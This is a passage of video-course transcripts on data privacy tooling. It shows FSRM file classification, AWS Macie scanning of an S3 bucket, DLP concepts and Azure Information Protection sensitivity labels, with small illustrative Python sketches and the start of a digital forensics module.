property to assign to files drop-down list box. [Video description ends]
Now you might have noticed when I right-click on Classification Rules, I can create a classification schedule.
So I can have this happen on a periodic basis automatically. But I can also, over on the right in the Actions
panel here.
[Video description begins] He closes the Create Classification Rule dialog box. Then he right-clicks on the
Classification Rules file in the navigation pane and a flyout opens which includes an option labeled
"Configure Classification Schedule". [Video description ends]
I can also Run Classification With All Rules, which I'm going to do now manually. It says Run classification
in the background, sure, OK.
[Video description begins] The Action pane is divided into two sections labeled "Classification Rules" and
"View". He clicks an option labeled "Run Classification With All Rules" in the Classification Rules section. A
dialog box labeled "Run Classification" opens. [Video description ends]
And we can see down below some status output here. So we can see that it's looking through our file system
and it looks like it's already done, excellent.
[Video description begins] The dialog box includes a radio button labeled "Run classification in the
background", which is selected by default. He selects a button labeled "OK" and the Run Classification dialog
box closes. Another pane adds in the content pane. It displays a run classification hierarchy. [Video
description ends]
Well, why don't we go take a look at the file system to see what's up. In other words, let's right-click on the file
that we looked at previously, the CreditCardData file under Properties, Classification. Notice it has
automatically flagged this as PII Yes.
[Video description begins] He switches to the SampleFiles folder. Then he right-clicks on the CreditCardData
file to open its properties dialog box. Then in the CreditCardData Properties dialog box, he opens the
Classification tab. Then he points to the Yes radio button. [Video description ends]
So this is just but one simple example of what you might do on-premises to automate file classification.
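If you wanted to script a rough equivalent yourself instead of relying on FSRM, a Python sketch like the one below could walk a folder, apply the same simple keyword condition, and record a PII yes/no result. The scan root, file pattern, keyword, and CSV report are all assumptions for illustration; this is not how FSRM stores its classification metadata.

import csv
from pathlib import Path

KEYWORD = "credit"                           # same simple string condition as the demo rule
SCAN_ROOT = Path("D:/")                      # assumed scan scope
REPORT = Path("classification_report.csv")   # assumed output file

def contains_keyword(path):
    # True if the file's text content contains the keyword (case-insensitive).
    try:
        text = path.read_text(errors="ignore")
    except OSError:
        return False
    return KEYWORD.lower() in text.lower()

with REPORT.open("w", newline="") as out:
    writer = csv.writer(out)
    writer.writerow(["file", "PII"])
    for file_path in SCAN_ROOT.rglob("*.txt"):
        writer.writerow([str(file_path), "Yes" if contains_keyword(file_path) else "No"])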
During this video, you will learn how to configure cloud data classification using Amazon Web Services'
Macie.
Objectives
[Video description begins] Topic title: Cloud-based Data Classification. The presenter is Dan
Lachance. [Video description ends]
In the enterprise, we know that data classification is important. It's important because if we don't know what kinds of data we have, and if they're not classified, it becomes very cumbersome to try to protect specific types of data. If for regulatory compliance we have to protect product data, financial data, or medical data, and we don't know what we have that's medical, product, or financial, how are we going to properly protect it in accordance with laws and regulations? So we can enable data classification mechanisms in cloud environments, specifically, in our example, in Amazon Web Services or AWS using a service called Macie, M-A-C-I-E.
[Video description begins] A web page labeled "AWS Management Console" opens. It includes a search box
labeled "Find Services" in a section labeled "AWS services". [Video description ends]
I'm going to search for macie and we're going to click on Amazon Macie here. The first thing we're going to
have to do is enable this feature in the cloud. So I'm going to go ahead and click the Get started button.
[Video description begins] He types mac in the Find Services search box and its search result includes a link
labeled "Amazon Macie". He clicks the Amazon Macie link and its corresponding web page opens. It includes
a button labeled "Get Started". [Video description ends]
It's going to apply to the selected geographic region here where I've got data stored, in this case, US East (N. Virginia). I can change that if I so choose. That's where the bulk of my data is stored, so I'm going to leave it there.
[Video description begins] The Enable Amazon Macie page opens. It includes a drop-down list labeled
"Region" in which US East (N. Virginia) is set by default. Then he points to a drop-down list in which US East
(N. Virginia) region is selected. [Video description ends]
We can also view service role permissions. There's a built-in identity and access management role here that requires specific permissions to be able to look at data, such as data stored in an S3 bucket.
[Video description begins] He clicks a button labeled "View service role permissions" and a window labeled
"Macie service role permissions" opens. It includes tabs labeled "Permissions" and "Trust relationships". The
Permissions tab is selected by default. It displays a set of code in Read-only mode. [Video description ends]
Now, in Amazon Web Services an S3 bucket is a cloud storage location. And that's what we want Macie to
examine, to look for sensitive data and classify it as such.
[Video description begins] He closes the Macie service role permissions window. [Video description ends]
So I'm going to click Enable Macie in the bottom-right. That's going to take me to an Amazon Macie
configuration page.
[Video description begins] A web page labeled "Amazon Macie" opens. It is divided into three parts: menu
bar, navigation pane, and content pane. The navigation pane includes options labeled "DASHBOARD" and
"SETTINGS". The DASHBOARD option is selected and its corresponding content is displayed in the content
pane. It includes four tiles labeled "Critical assets", "Total event occurrences", "Total user sessions", and
"Total users (0)". [Video description ends]
Here on the main Amazon Macie page, we're looking at a DASHBOARD of discovered critical assets and any suspicious event occurrences. However, what I want to do is go down to SETTINGS on the left. Here, we can take a look at how data will be classified.
[Video description begins] He clicks the SETTINGS option in the navigation pane and its corresponding blade
opens. It includes an icon labeled "Theme". [Video description ends]
For example, if I click on Theme, here I can see Attorney Client Privileged, that could be important, Banking Keywords, or Credit Card Keywords. If I click on Credit Card Keywords, it's going to look for checkcard, debitcard, check card and debit card with spaces, cardholder, and so on.
[Video description begins] The page labeled "Themes" opens. It includes a table with four columns and
multiple rows. The column headers are Theme title, Minimum keyword combinations, Risk, and Enabled. He
points to row entries under the Theme title column header. A page labeled "Edit theme details" opens. He
points to an information labeled "Training set keywords". [Video description ends]
Well, that's interesting. So we can edit these theme details to make changes. I'm just going to CANCEL here. What's going to happen if it discovers those keywords is that it's going to classify the data, and we also have a risk value associated with it. If we go into our SETTINGS again and choose Content type, again, here we could search for specific types of files and see how they would be classified.
[Video description begins] In the SETTINGS page, he clicks an icon labeled "Content type" and its
corresponding page opens. It includes a table with five columns and multiple rows. The column headers are
Name, Description, Classification, Risk, and Enabled. [Video description ends]
[Video description begins] He points to Adobe Application Manager and Binary row entries under the
Description and Classification column headers respectively. [Video description ends]
Now, I can click on INTEGRATIONS on the left because I need to link these settings in Amazon Macie with
S3 storage buckets. So here's my Amazon Web Services Account ID. I'll click SELECT over on the right. And
I need to add some S3 buckets.
[Video description begins] He clicks an option labeled "INTEGRATIONS" in the navigation and its
corresponding page opens in the content pane. It includes a tab labeled "S3 RESOURCES" which further
includes an Account ID. He points to the Account ID labeled "611279832722". Then he clicks a button labeled
"SELECT". A section labeled "Integrate S3 resources with Macie" appears which includes buttons labeled
"ADD" and "EDIT". [Video description ends]
So I'll click ADD and I'm going to scroll down. I'm going to choose a bucket where I know I've got some
content here.
[Video description begins] A section labeled "Add S3 resources to Macie" displays. It includes a table with
four columns and multiple rows. The column headers are S3 resources, Total objects, Processed estimate, and
Cost estimate. Each row has a checkbox adjacent to it. He selects a checkbox adjacent to a bucketyyz row
entry under the S3 resources. [Video description ends]
So I'll put a check mark next to it. And up above, I'm going to go ahead and click ADD. Okay, so our bucket is
listed over here. It's called bucketyyz. And I'll click REVIEW and START CLASSIFICATION.
[Video description begins] A dialog box labeled "Configure classification methods for your new and existing
S3 objects. Learn more" opens. It includes information about classification of new and existing objects. He
clicks a button labeled "Review". The dialog box displays an information about Number of S3 resources
selected: 1, Total size: 15MB, Total number of objects: 118, Processed estimate: 15 MB, Classification of new
objects type: Full, Classification of existing objects type: Full (Total cost estimate: $0). Then he clicks a
button labeled "START CLASSIFICATION". [Video description ends]
It says that settings have been updated. The selected buckets and paths will be protected by Macie. Okay, I'll
click DONE.
[Video description begins] The Configure classification methods for your new and existing S3 objects. Learn
more dialog box closes. The S3 RESOURCES tab displays in which a new row adds in the table. The row
entries under the Selected S3 resources, New objects, Existing objects are bucketyyz/, Full, and Full
respectively. [Video description ends]
So far, so good. Now, what I need to do is give it a chance to start taking a look at what's stored in the bucket to determine how it will classify any data. After a few minutes, on the Amazon Macie DASHBOARD, if I scroll down a little bit, here I've got S3 objects for selected time range selected. We can see a little bit of a graph for all the data and the time ranges that were detected.
[Video description begins] He opens the DASHBOARD page. Then he points to an icon labeled "S3 objects for
selected time range". The DASHBOARD also includes a pie chart which represents All Data, Range: 0-6
months ago, Range: beyond 6 months ago, encryption_key, and json/other entities with different colors. [Video
description ends]
Now we could double-click, for example, on all of the data in S3, where we can see all of the matched results, plotted of course across dates.
[Video description begins] He clicks All Data and two bar graphs display. The x-axis represents values and
the y-axis represents months in the first graph. The second graph displays x-axis which represents
months. [Video description ends]
Now, as I scroll down, I can see the summary listed below.
[Video description begins] He scrolls down to a section labeled "Search results summary". It includes a table
with two columns and multiple rows. The column headers are Field and (Top 10/Bottom 10). [Video
description ends]
So, for example, Object PII priority and Object language codes, risk levels 5 or 6. If I double-click on that, I can start to see some of the details listed for it. I can even export it as a CSV file or as a PNG image file.
[Video description begins] He double-clicks 5 6 row entry under the (Top 10/Bottom 10) column header. An
information box opens which displays percentage bar for 5 and 6. The 5's percentage bar sets to 96.15%(25)
and the 6's percentage bar sets to 3.84% (1). The information box also includes two icons labeled "export as
csv" and "export as png". He points to the icons. [Video description ends]
I can click the little icon next to the magnifying glass to read the details about exactly what it's referring to in
terms of risk. And I can go down and start to see some file names that were inventoried and discovered in that
S3 bucket.
[Video description begins] He clicks a search icon adjacent to the 5's percentage bar and a table with five
columns and multiple rows displays. The column headers are Date, Type, User, Description, and Risk. The
table displays a search result of the Object risk level 5. [Video description ends]
So we have a number of ways that we can do that. Let's go back to the DASHBOARD. And we can also view
it by S3 objects.
[Video description begins] He opens the DASHBOARD page. Then he clicks an icon labeled "S3 objects". It
displays four percentage bars labeled "email/all", "json/other", "Credit Card Keywords", and
"encryption_key". Their respective percentage values are 49.05% (26), 47.16% (25), 1.88% (1), and 1.88%
(1). [Video description ends]
So, for example, I can see how the data has started to be classified, e-mail, and it looks like we have something for Credit Card Keywords. We can see a percentage listing there for some of those items that were discovered. And we can click the magnifying glass to the left to find out exactly which items stored in the cloud relate to credit card data. We can see it looks like we've got a file called CardData.
[Video description begins] He clicks a search icon adjacent to the Credit Card percentage bar and the Search
results summary section displays. It includes a table with five columns and a row. The column headers are
Date, Type, User, Description, and Risk. [Video description ends]
So if I click on that link, it'll give me some more details about that selected item, such as when it was last modified and the bucket that it's stored in.
[Video description begins] He clicks a CardData.txt row entry under the Description column header. A table
with two columns and multiple rows displays. The column headers are Field and Value. [Video description
ends]
And we can also see some other details listed here, such as the Object risk level and anything else in terms of metadata tied to that specific item. So we could open up a new web browser window; I'm just going to duplicate what we're looking at here, and maybe we'll just go back to the main Amazon Web Services page.
[Video description begins] He opens the AWS Management Console. Then he types S3 in the Find Services
search box and its result includes a link labeled "S3". He clicks the S3 link and its corresponding web page
labeled "S3 Management Console" opens. It is divided into three parts: menu bar, navigation pane, and
content pane. The navigation pane includes an option labeled "Buckets" and its corresponding blade is open
in the content pane. It include a table with four columns and multiple rows. The column headers are Bucket
name, Access, Region, and Date created. [Video description ends]
Now here on the management console page, we can go into the S3 bucket and take a peek. We're looking for a bucket by the name of bucketyyz. If I click on that to open it up, there's the CardData file. We can actually open it up; it's just a text file, so it's going to open right here in the browser.
[Video description begins] He double-clicks a bucketyyz row entry under the Bucket name column header and
its corresponding blade opens. It includes tabs labeled "Overview", "Properties", and "Permissions". The
Overview tab is selected. It includes a table with four columns and multiple rows. The column headers are
Name, Last modified, Size, and Storage class. Then he clicks a CreditData.txt row entry under the Name
column header and its corresponding blade opens. It includes tabs labeled "Overview", "Properties", and
"Permissions". The Overview tab is selected. It includes a button labeled "Open" and information about
Owner, Last modified, Etag, Storage class, Server-side encryption, and Size. He clicks the Open button and
the CreditData.txt file opens in the browser. [Video description ends]
And we can see it does indeed have some debit card numbers, and that's why Macie was able to discover it and classify it as sensitive data. Now, while you're going through the DASHBOARD, the other thing you're going to notice is that it generates queries as you start clicking on items down below. So if I start clicking on things, there's a query up at the top.
[Video description begins] He switches to the Amazon Macie Console. Then he opens the DASHBOARD page.
Then he clicks the S3 objects for selected time range icon and its corresponding pie chart displays. He clicks
the All data entity in the pie chart. [Video description ends]
However, you can also type in your own queries looking for strings or dates and times, whatever the case
might be.
[Video description begins] He clicks at the center of the pie chart which represents All data entity and its
displays a query box which includes the following query: themes AND dlp_risk[5 TO *] AND @timestamp.*.
It also displays a bar graph. The x-axis represents values and the y-axis represents months in the first graph.
The second graph displays x-axis which represents week days. [Video description ends]
So we can remove all of these items and even type in our own query if we know what we're looking for. For example, I'm going to put in filesystem_metadata.bucket with bucketyyz referred to, along with a PII impact of moderate or a PII impact of high. So, if we do a search over a specific time range, here it's all time, we'll get our results listed, and we can wait for the summary to be rendered down at the bottom.
[Video description begins] He pastes the following query in the query box:
filesystem_metadata.bucket:"bucketyyz" AND (pii_impact:"moderate" OR pii_impact:"high"). Then he clicks
a search icon and a bar graph displays. It also displays a table in the Search result summary section. [Video
description ends]
So you can also query this stuff depending on what your needs are.
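The queries shown here come from the classic Macie console. If you wanted to pull similar information programmatically, the current Macie API (the macie2 client in boto3) lets you list and retrieve findings. Here is a rough sketch, assuming boto3 is installed, credentials are configured, and Macie is enabled in the region; treat the severity criterion field name as an assumption to verify against the Macie documentation.

import boto3

macie = boto3.client("macie2")

# List finding IDs, filtering for high-severity findings.
response = macie.list_findings(
    findingCriteria={
        "criterion": {
            "severity.description": {"eq": ["High"]}   # assumed criterion field name
        }
    }
)

finding_ids = response.get("findingIds", [])
if finding_ids:
    # Retrieve details for a small batch of the matching findings.
    details = macie.get_findings(findingIds=finding_ids[:50])
    for finding in details.get("findings", []):
        severity = finding.get("severity", {}).get("description")
        print(finding.get("title"), "-", severity)
else:
    print("No matching findings.")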
In this video, you will learn when to use DLP solutions for data privacy.
Objectives
[Video description begins] Topic title: Data Loss Prevention. The presenter is Dan Lachance. [Video
description ends]
Data Loss Prevention or DLP is an important aspect of IT security, where the security technician needs to
ensure that sensitive data isn't disclosed to unauthorized parties. According to Wikipedia, the term data breach can be defined as the intentional or unintentional release of secure or private and confidential
information to an untrusted environment. Notice that the words intentional and unintentional are listed here.
We don't have to only think about malicious users, but we have to think about mistakes that might be made by
internal employees that could result in data breaches.
So the success of a DLP program is related to user awareness and training. Users need to be aware of social engineering scams that can be used to infect machines or trick people into disclosing sensitive information directly. During new employee onboarding, so for new hires, user awareness and security training should be part of that process. Of course, it should be a continual process, for example annually, even for existing employees, as security threats change over time. So periodic training updates on the latest scams are a big deal, such as tax department phone calls trying to scare people into wiring money or sending e-transfers because they supposedly have money owing, otherwise they'll be thrown in jail. People need to know that is not how things work with tax departments. So it's all about knowledge and awareness.
Now, there's also the technical side to data loss prevention for the protection of digital rights. That's often
called Digital Rights Management or DRM. So if we've got sensitive data that's being used within the
organization, we then have to think about, as we see in the bottom right of our diagram, the data loss prevention policies that we might configure. These would consist of conditions that might be triggered, such as someone sending an email message outside of the organization with a file attachment, and then the actions that might be taken. Those actions might include limiting removable media use, in other words, unless the USB thumb drive is encrypted, no one's allowed to copy files to it. Or in email programs, we might prevent the
printing of sensitive email messages, or the forwarding of sensitive email messages. And we might prevent file
attachments when sending email outside of the company and limit access to social media content. So a lot of
these are actions that will be triggered based on your DLP policy conditions. So for example, if a mail message
is received that's encrypted and flagged as highly confidential, then there's no way that our policies would
allow that to be printed or forwarded to others.
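To make the condition-and-action idea concrete, here is a toy Python sketch of how a DLP policy engine might evaluate an outbound email message. The message fields, the organization domain, the conditions, and the action names are purely illustrative assumptions, not any vendor's actual policy format.

from dataclasses import dataclass, field

ORG_DOMAIN = "example.com"   # assumed organization domain

@dataclass
class OutboundEmail:
    sender: str
    recipients: list
    attachments: list = field(default_factory=list)
    labels: list = field(default_factory=list)

def is_external(recipient):
    return not recipient.lower().endswith("@" + ORG_DOMAIN)

def evaluate_dlp(msg):
    # Return the list of DLP actions triggered for this message.
    actions = []
    goes_external = any(is_external(r) for r in msg.recipients)
    # Condition: sensitive label plus an external recipient -> block the send.
    if "Highly Confidential" in msg.labels and goes_external:
        actions.append("block-send")
    # Condition: attachments leaving the organization -> strip them.
    if msg.attachments and goes_external:
        actions.append("strip-attachments")
    return actions

msg = OutboundEmail("alice@example.com", ["bob@partner.org"],
                    attachments=["payroll.xlsx"], labels=["Highly Confidential"])
print(evaluate_dlp(msg))   # ['block-send', 'strip-attachments']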
In this video, you will configure DLP policies with Microsoft Azure.
Objectives
[Video description begins] Topic title: Deploying Cloud-based Data Loss Prevention. The presenter is Dan
Lachance. [Video description ends]
The Microsoft Azure Cloud supports data loss prevention in the form of Azure Information Protection or AIP.
[Video description begins] A web page labeled "Home - Microsoft Azure" opens. It is divided into three parts:
menu bar, navigation pane, and content pane. The menu bar includes a search box and icons. Some of the
icons are Settings, Help, and User. The navigation pane includes options labeled "Home" and "Dashboard".
The Home option is selected by default and its corresponding content is displayed in the content pane. [Video
description ends]
I've signed into the Azure portal so I'm going to search for information. I'm going to choose Azure Information
Protection.
[Video description begins] He types info in the search box and its search result includes a link labeled "Azure
Information Protection". A blade labeled "Azure Information Protection - Labels" opens. It is divided into two
sections: navigation pane and content pane. The navigation pane includes options labeled "General" and
"Classifications". The Classifications option is expanded which contains two sub options labeled "Labels" and
"Policies". The Labels sub option is selected and its corresponding blade is displayed in the content pane. The
content pane includes a table with multiple columns and a row. The column headers include LABEL DISPLAY
NAME and POLICY. A link labeled "Add a new label" row entry is displayed below the table. [Video
description ends]
The first thing I'm going to do is click Add a new label. So this is a sensitivity label, for example. I'm going to
call this Highly Sensitive. We're talking about flagging documents that people might work with in some way to
protect them, that's why I'm creating this.
[Video description begins] A blade labeled "Label" opens. He types Highly Sensitive in a text box labeled
"Label display name". [Video description ends]
I'll specify a description for the Highly Sensitive label. I can also choose colors I want to associate with
different labels, and I'm going to set the document to Protect. I want to protect documents that contain that
label.
[Video description begins] A description displays in a text box labeled "Description". The description is as
follows: Customer or internal sensitive data that should not be shared outside of the organization. The blade
also includes a toggle button labeled "Color". It has two options labeled "Select from list" and "Custom". The
Select from list option is selected. A drop-down box is linked with it. He clicks the drop-down list box and a
drop-down list opens. He selects an option labeled "Orange" from the drop-down list. [Video description ends]
Now as I take a look over here on the right, I can also add permissions. So I'm going to click Add permissions.
So who should be allowed to work with documents using that sensitivity label?
[Video description begins] The blade also includes a toggle button labeled "Set permissions for documents
and emails containing this label". It has three options labeled "Not configured", "Protect", and "Remove
Protection". The Not configured option is selected by default in the Set permissions for documents and emails
containing this label toggle button. He selects the Protect option and its corresponding section labeled
"Protection" opens. Along with this, its corresponding blade labeled "Protection" opens. It includes a toggle
button labeled "Protection settings" which contains two options labeled "Azure (cloud key)" and "HYOK (AD
RMS)". The Azure (cloud key) option is selected by default. It further includes two radio buttons labeled "Set
permissions" and "Set user-defined permissions (Preview)". The Set permissions radio button is selected and
its corresponding table is displayed with two columns and a row. The column headers are USERS and
PERMISSIONS. A link labeled "Add permissions" is displayed below the table. He clicks the Add permissions
link and its corresponding blade labeled "Add permissions" opens. [Video description ends]
So I can browse any users I might have created in my cloud-based Azure Active Directory or AAD. I've got a
user I'm going to search for called Max Bishop that I've already created in Azure Active Directory.
[Video description begins] The Add permissions blade includes a tab labeled "Select from the list" which
includes a link labeled "Browse directory". He clicks the Browse directory link and its corresponding blade
labeled "AAD Users and Groups" opens. It includes a search box and a list of users and groups. Some of the
users and groups are labeled "EastAdmins" and "Max Bishop". [Video description ends]
So I'm going to select Max Bishop. So he's been added to the list of users and down below I have to determine
what he can do.
[Video description begins] He selects the Max Bishop user from the list. Then he clicks a button labeled
"Select" and the AAD Users and Groups blade closes. The Max Bishop user id labeled
"[email protected]" displays under a section labeled "USERS". The Add permissions blade also
includes a toggle button labeled "Choose permissions from preset or set custom". It has five options labeled
"Co-Owner", "Co-Author", "Reviewer", "Viewer", and "Custom". The Co-Owner option is selected and its
corresponding list of permissions is displayed which includes permissions labeled "View, Open, Read (VIEW)"
and "Save (EDIT)". [Video description ends]
Is he only a Viewer or is he a Co-author to the document, or do I want to select custom permissions for that
account? I'm going to choose Co-owner and then click OK.
[Video description begins] He selects the options one by one and their corresponding permissions display one
by one under a section labeled "PERMISSIONS". He keeps the default, Co-Owner option selected and closes
the Add permissions blade. [Video description ends]
Down below for allow offline access, I'm going to choose Never, and then I'll click OK. So they must be
connected to the network to work with that document. So that's the Microsoft Azure cloud key protection
configuration.
[Video description begins] The Protection blade also includes a toggle button labeled "Allow offline access".
It has three options labeled "Always", "Never", and "By days". The By days option is selected. He selects the
Never option and closes the Protection blade. [Video description ends]
I'm also going to turn on a watermark here that I want in the background of the document.
[Video description begins] The Label blade also includes a toggle button labeled "Documents with this label
have a watermark". It has two options labeled "Off" and "On". The Off option is selected by default. He selects
the On option and a text box labeled "Watermark text" displays. He types Property Of Lachance IT in the
Watermark text text box. [Video description ends]
It's going to say Property Of Lachance IT, and then I'm going to add a new condition here. Basically, I can
choose an industry flag that would be applied here, let's say, for credit card numbers, and I can save that
configuration.
[Video description begins] The Label blade also includes a section labeled "Configure conditions for
automatically applying this label". It includes a link labeled "Add a new condition". He clicks the new
condition link and its corresponding blade labeled "Condition" opens. It includes a toggle button labeled
"Choose an industry". It has four options labeled "All", "Financial", "Medical and Health", and "Privacy".
The All option is selected by default. He selects the Financial option and its corresponding industry names
displays under a section labeled "NAME". Some of the industry names are labeled "Credit Card Number" and
"EU Debit Card Number". He selects a checkbox adjacent to the Credit Card Number. [Video description
ends]
Okay, so we've got a new condition that will determine whether Highly Sensitive is automatically applied to
documents, if it looks like they contain credit card info. So I'm going to Save that label information. So I've
defined a label called Highly Sensitive.
[Video description begins] He clicks an icon labeled "Save". A dialog box labeled "Save settings" opens. It
includes a button labeled "OK". He clicks the OK button and the Condition blade closes. In the Label blade, a
new row adds in the table displayed in the Configure conditions for automatically applying this label section.
The row entries under the CONDITION NAME and OCCURRENCES are Credit Card Number and 1
respectively. Then he clicks an icon labeled "Save" and the Label blade closes. A new row entry adds in the
table displayed in the Labels blade. A Highly Sensitive row entry displays under the LABEL DISPLAY NAME
column header. There is no row entry under the POLICY column header. A check mark is displayed under the
MARKINGS and PROTECTION column headers. [Video description ends]
Now I haven't assigned it yet to a policy. There's nothing in the policy column. So I'm going to click Policies
here in Azure Information Protection, and I'm going to create a new policy. You add labels to a policy. So this
policy, I'm simply going to call Policy 1.
[Video description begins] He clicks the Policies option in the navigation pane and its corresponding blade
opens in the content pane. It includes a link labeled "Add a new policy". He clicks the Add a new policy link
and its corresponding blade labeled "Policy" opens. It includes a section labeled "Configure administrative
name, description and scope for this policy" which further includes a text box labeled "Policy Name". He types
Policy 1 in the Policy Name text box. [Video description ends]
Down below, I have to select the users or groups that will get the policy. So I'm going to go ahead and browse
over here on the right until I find user Max Bishop. So I'm going to go ahead and select him and I'll click OK.
[Video description begins] The blade also includes a section labeled "Select which users or groups get this
policy. Groups must be email-enabled". He clicks this section and its corresponding blade labeled "AAD
Users and Groups" opens. It includes a section labeled Users/Groups. He clicks the Users/Groups section and
its corresponding blade labeled "AAD Users and Groups" opens. It includes a search box and a section of
which will display a list of users and groups. He types max in the search box and a user labeled "Max Bishop"
displays. He selects that user and clicks a button labeled "Select". The AAD Users and Groups blade closes.
The Max Bishop user with the email id labeled "[email protected]" displays under the Users/Groups
section. [Video description ends]
Then I'll click Add or remove labels for this policy. We already have one label that we've created called Highly
Sensitive. So there it is in the list.
[Video description begins] He clicks the OK button and the AAD Users and Groups blade closes. The Max
Bishop user name adds in the Select which users or groups get this policy. Groups must be email-enabled.
section in the Policy blade. The Policy blade also includes a link labeled "Add or remove labels". [Video
description ends]
I'm going to select that and I'm going to click OK. So it's been added to the policy here.
[Video description begins] He clicks the Add or remove labels link and its corresponding blade labeled
"Policy: Add or remove labels" opens. It includes a table with two columns and a row. The column headers
are LABEL DISPLAY NAME and POLICY. The row entry under the LABEL DISPLAY NAME column header
is Highly Sensitive. The row entry under the POLICY column header is not displayed. He selects a checkbox
adjacent to the Highly Sensitive row entry. Then he clicks a button labeled "OK" and the Policy: Add or
remove labels blade closes. In the Policy blade, a new row adds in the table. The column headers are LABEL
DISPLAY NAME, POLICY, MARKING, and PROTECTION. The respective row entries under the LABEL
DISPLAY NAME and POLICY are Highly Sensitive and Policy 1. A check mark is displayed under the
MARKING and PROTECTION column headers. [Video description ends]
So as I scroll down, I have a number of other settings here, such as selecting a default if I wish.
[Video description begins] He clicks a drop-down list box labeled "Select the default label". A drop-down list
opens which contains two options labeled "None" and "Highly Sensitive". The None option is selected by
default. He selects the "Highly Sensitive" option. [Video description ends]
So if the user doesn't select anything, everything will be treated as highly sensitive by default. So I'm going to
Save this policy. So we've got a custom label added to a custom policy called Policy 1.
[Video description begins] He selects an option labeled "On" for a toggle button labeled "All documents and
emails must have a label (applied automatically or by users)". He clicks the Save button and the Policy blade
closes. A row entry adds below the POLICY column header that is Policy 1. [Video description ends]
Now the next thing I have to do is download and install the Azure Information Protection client for the
appropriate device platform, such as Windows.
[Video description begins] He opens a web page labeled "Microsoft Azure Information Protection". [Video
description ends]
This is what integrates with products like Microsoft Word, which I've got open here. Notice that Highly
Sensitive is shown here as a sensitivity label by default. I can go up to the Protect button in the toolbar, and I
can see some of my sensitivity labels.
[Video description begins] He opens an empty word document which includes a label "Highly Sensitive". He
clicks a menu labeled "Protect" in the ribbon. A flyout opens which includes options labeled "Highly
Sensitive" and "Show Bar". [Video description ends]
So back here in the Azure portal, let's just take a quick peek here at the Azure Information Protection
configuration. Indeed, we're going to see that Highly Sensitive is our label and it was assigned to Policy 1.
[Video description begins] He switches to the Home - Microsoft Azure web page. Then he types info in the
search box and clicks the Azure Information Protection from the search result. The Azure Information
Protection - Labels blade opens. The table displayed in the content pane displays Highly Sensitive and Policy
1 row entries under the LABEL DISPLAY NAME and POLICY column headers. He points to these row entries.
Then he opens the Policies blade and its corresponding table displays. He points to the Policy 1 row entry
under the POLICY column header. [Video description ends]
Let's go to the policies view, there's Policy 1. And so when we open up Policy 1, this is where we'll see that it
was assigned to Max Bishop. And that the label display here added to the policy is Highly Sensitive.
[Video description begins] He clicks the Policy 1 row entry and its corresponding blade labeled "Policy:
Policy 1" opens. [Video description ends]
And we can see our configuration here. Highly Sensitive is the default label, that's why it shows up with a
brand new document in Microsoft Word. And we're displaying the Protection bar, the icon, in Microsoft Office
apps. That's why we see that icon listed here at the top center.
[Video description begins] He switches to the word document. [Video description ends]
So I'm going to go ahead and type something in and then start to work with this document. And what's going to
happen when I save this is that it tells me it's highly sensitive and I've also got the custom watermark shown in
the background. So when I view the permissions, I can see the permissions assigned in this case to user
MBishop.
[Video description begins] He types This is a sample document. Then he saves the word document. An
information bar displays with a button labeled "View Permission..." and a Lachance IT watermark displays in
the background of the word document. He clicks the View Permission... button and a dialog box labeled "My
Permission" opens. He closes the My Permission dialog box. [Video description ends]
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined data privacy standards and regulations for protecting Sensitive Personal
Information, and we talked about what an organization can do to ensure data privacy regulatory compliance.
We did this by exploring examples of PII and PHI. We looked at the role that regulatory compliance plays in
the design and development of organizational security policies. We talked about how HIPAA protects sensitive
medical information, how GDPR assures data privacy for European Union citizen data, and also the purpose of
PCI DSS for merchants that handle cardholder data. Then we talked about how to configure server-based
data classification using Windows Server File Server Resource Manager. We looked at how to configure
cloud-based data classification using Amazon Web Services Macie. We talked about when data loss prevention
or DLP solutions should be used for data privacy. And finally, we talked about how to use Microsoft Azure to
configure DLP policies. In our next course, we'll move on to explore the use of digital forensics for the
gathering and handling of digital evidence, including forensics hardware and software solutions.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. Your host for this session is Dan Lachance, an IT
Trainer / Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author, and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA and Microsoft. Some of my specialties, over the years have
included networking, IT security, Cloud Solutions, Linux management and configuration, and troubleshooting
across a wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst or CySA+
certification exam is designed for IT professionals looking to gain security analyst skills to perform data
analysis; to identify vulnerabilities, threats, and risks to an organization; to configure and use threat detection
tools; and to secure and protect an organization's applications and systems.
In this course, we're going to explore how digital forensics helps ensure the proper collection and handling of
digital evidence. As well as looking at some common digital forensics hardware and software solutions. I'll
start by examining the purpose of digital forensics and the importance of the chain of custody, proper evidence
gathering and handling. I'll then explore some of the common digital forensics hardware and software solutions
and show how to acquire a hard disk image using the Linux DD command. Next, I'll demonstrate how to
enable legal hold for an Amazon Web Services S3 bucket. And lastly, I'll show how to restore deleted files on
both the Linux and Windows platforms.
2. Video: Digital Evidence Gathering (it_cscysa20_13_enus_02)
Upon completion of this video, you will be able to describe the purpose of digital forensics.
Objectives
[Video description begins] Topic title: Digital Evidence Gathering. The presenter is Dan Lachance. [Video
description ends]
If you've ever been involved in the gathering of digital evidence that might be related to a crime, so therefore
the admissibility in a court of law is relevant, then you might have experience with digital forensics.
Digital forensics is defined as the application of computer science and data recovery to the law. And so very
specific techniques must be employed to ensure proper governance of any acquired digital evidence. And also
to make sure that it's not been tampered with. So if this is potential legal evidence, the stakes are high because
it needs to be made admissible in a court of law. The digital forensics process starts with gathering of evidence.
[Video description begins] The Digital Forensics Process [Video description ends]
Whether that's making sure you acquire a cell phone from a potential suspect, or storage devices, or keep a
machine running once a location has been raided, anything along those lines. Next, analysis of that acquired
data. Now if we're talking about a storage device, for example, we want to make sure that we analyze a copy of
that data, never the original. And so part of digital forensics is making a digitally forensic sound copy of data
that is admissible in a court of law. And generating things like file system hashes on the original data, as well
as the analyzed data, so that we can determine whether or not changes have been made. Because there's always
the possibility of tampering with evidence. Then there's ultimately the reporting of conclusions that were
drawn by the investigators based on the analysis of digital data. This also means reporting which tools and
techniques were used and a way to prove that the sensitivity of the data and the protection of it while it was
stored was preserved.
Digital forensics results seek to answer questions such as what happened, when did it happen, and who was
involved with it happening? Now, the who-was-involved part can be difficult, as can all of these key points,
such as determining who was at a computer when some kind of alleged crime took place. Just because
something came from a person's computer or IP address does not necessarily tie that person to being the one
that executed or perpetrated that crime. Of course, additional evidence, like surveillance video and so on, could
help to prove that and solidify the evidence.
